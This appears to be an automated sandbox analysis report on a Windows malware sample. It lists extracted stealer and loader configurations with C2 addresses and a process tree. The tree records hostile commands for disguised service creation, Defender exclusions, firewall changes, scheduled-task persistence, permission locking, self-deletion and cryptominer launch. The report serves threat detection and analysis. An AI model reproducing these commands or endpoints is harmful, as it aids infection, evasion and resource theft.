Analysis
-
max time kernel
44s -
max time network
201s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
13-10-2021 17:03
General
-
Target
21fbb712aab6d4e991d123a1e9c0cedf.exe
-
Size
311KB
-
MD5
21fbb712aab6d4e991d123a1e9c0cedf
-
SHA1
127cba0dbc74422e00f431f42a2713cf108b9cb4
-
SHA256
d3184ceae376a789ccd61e767da3f21cacd72dfc7162a5e1a9569c7244d0bf9a
-
SHA512
dca4b74ec7107d982829a9a697570ffef8b4eb7e59b2fe9139ab5a4f655062f421fc6897d99ffc2275e15d3c4ab7f61bfb9ecc9a3485a440c0d0fd86e22f57ce
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://honawey7.xyz/
http://wijibui0.xyz/
http://hefahei6.xyz/
http://pipevai4.xyz/
http://nalirou7.xyz/
http://xacokuo8.xyz/
http://hajezey1.xyz/
http://gejajoo7.xyz/
http://sysaheu9.xyz/
http://rixoxeu9.xyz/
rc4.i32
rc4.i32
Extracted
Family
tofsee
C2
quadoil.ru
lakeflex.ru
Extracted
Family
vidar
Version
41.3
Botnet
1033
C2
https://mas.to/@oleg98
Attributes
-
profile_id
1033
Extracted
Family
raccoon
Version
1.8.2
Botnet
fbe5e97e7d069407605ee9138022aa82166657e6
Attributes
-
url4cnc
http://telemirror.top/stevuitreen
http://tgmirror.top/stevuitreen
http://telegatt.top/stevuitreen
http://telegka.top/stevuitreen
http://telegin.top/stevuitreen
https://t.me/stevuitreen
rc4.plain
rc4.plain
Extracted
Family
redline
Botnet
w1
C2
109.234.34.165:12323
Extracted
Family
redline
Botnet
MegaProliv2
C2
93.115.20.139:28978
Extracted
Family
raccoon
Botnet
7ebf9b416b72a203df65383eec899dc689d2c3d7
Attributes
-
url4cnc
http://telegatt.top/agrybirdsgamerept
http://telegka.top/agrybirdsgamerept
http://telegin.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept
rc4.plain
rc4.plain
Extracted
Family
redline
Botnet
@Nastya_ero
C2
45.14.49.66:21899
Signatures
-
Arkei
Arkei is an infostealer written in C++.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 11 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Arkei Stealer Payload 1 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 7 IoCs
-
Vidar Stealer 2 IoCs
-
XMRig Miner Payload 2 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
VMProtect packed file 5 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 3 IoCs
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
autoit_exe 1 IoCs
AutoIT scripts compiled to PE executables.
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe"C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe"C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\7FE9.exeC:\Users\Admin\AppData\Local\Temp\7FE9.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7FE9.exeC:\Users\Admin\AppData\Local\Temp\7FE9.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\8A08.exeC:\Users\Admin\AppData\Local\Temp\8A08.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ydeernnp\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jcqcuoqd.exe" C:\Windows\SysWOW64\ydeernnp\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ydeernnp binPath= "C:\Windows\SysWOW64\ydeernnp\jcqcuoqd.exe /d\"C:\Users\Admin\AppData\Local\Temp\8A08.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ydeernnp "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ydeernnp2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\8E9B.exeC:\Users\Admin\AppData\Local\Temp\8E9B.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\9466.exeC:\Users\Admin\AppData\Local\Temp\9466.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\9792.exeC:\Users\Admin\AppData\Local\Temp\9792.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 904 -s 8682⤵
- Program crash
-
-
C:\Windows\SysWOW64\ydeernnp\jcqcuoqd.exeC:\Windows\SysWOW64\ydeernnp\jcqcuoqd.exe /d"C:\Users\Admin\AppData\Local\Temp\8A08.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\A24D.exeC:\Users\Admin\AppData\Local\Temp\A24D.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\B66A.exeC:\Users\Admin\AppData\Local\Temp\B66A.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BCE0.exeC:\Users\Admin\AppData\Local\Temp\BCE0.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\BCE0.exeC:\Users\Admin\AppData\Local\Temp\BCE0.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\C6B1.exeC:\Users\Admin\AppData\Local\Temp\C6B1.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 4402⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\C99F.exeC:\Users\Admin\AppData\Local\Temp\C99F.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\D302.exeC:\Users\Admin\AppData\Local\Temp\D302.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E2AC.exeC:\Users\Admin\AppData\Local\Temp\E2AC.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F3⤵
- Creates scheduled task(s)
-
-
C:\ProgramData\2103609787\2103609787.exe"C:\ProgramData\2103609787.\2103609787.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\F1CA.exeC:\Users\Admin\AppData\Local\Temp\F1CA.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\032fd786-c2a2-4232-9b67-8d5e65a989af\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\032fd786-c2a2-4232-9b67-8d5e65a989af\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\032fd786-c2a2-4232-9b67-8d5e65a989af\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
-
C:\Users\Admin\AppData\Local\Temp\032fd786-c2a2-4232-9b67-8d5e65a989af\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\032fd786-c2a2-4232-9b67-8d5e65a989af\AdvancedRun.exe" /SpecialRun 4101d8 28083⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\F1CA.exe" -Force2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\F1CA.exe"C:\Users\Admin\AppData\Local\Temp\F1CA.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\F1CA.exe"C:\Users\Admin\AppData\Local\Temp\F1CA.exe"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 17842⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\AA.exeC:\Users\Admin\AppData\Local\Temp\AA.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\207A.exeC:\Users\Admin\AppData\Local\Temp\207A.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1_1.exe"C:\Users\Admin\AppData\Local\Temp\1_1.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\ins.exe"C:\Users\Admin\AppData\Local\Temp\ins.exe"2⤵
-
C:\ProgramData\update.exe"C:\ProgramData\update.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "Admin:(R,REA,RA,RD)"4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "Admin:(R,REA,RA,RD)"5⤵
- Modifies file permissions
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ins.exe" & exit3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 54⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E510D8CC-019E-4335-A47E-1054117D25F5} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
964KB
-
Filesize
964KB
-
Filesize
4KB
-
Filesize
3.1MB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
856KB
-
Filesize
500KB
-
Filesize
19.2MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
36KB
-
Filesize
4.0MB
-
Filesize
4.3MB
-
Filesize
4.0MB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
64KB
-
Filesize
196KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
196KB
-
Filesize
112KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
19.0MB
-
Filesize
316KB
-
Filesize
568KB
-
Filesize
136KB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
136KB
-
Filesize
136KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
76KB
-
Filesize
18.8MB
-
Filesize
64KB
-
Filesize
18.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4.0MB
-
Filesize
68KB
-
Filesize
36KB
-
Filesize
568KB
-
Filesize
19.0MB
-
Filesize
316KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
4KB
-
Filesize
132KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB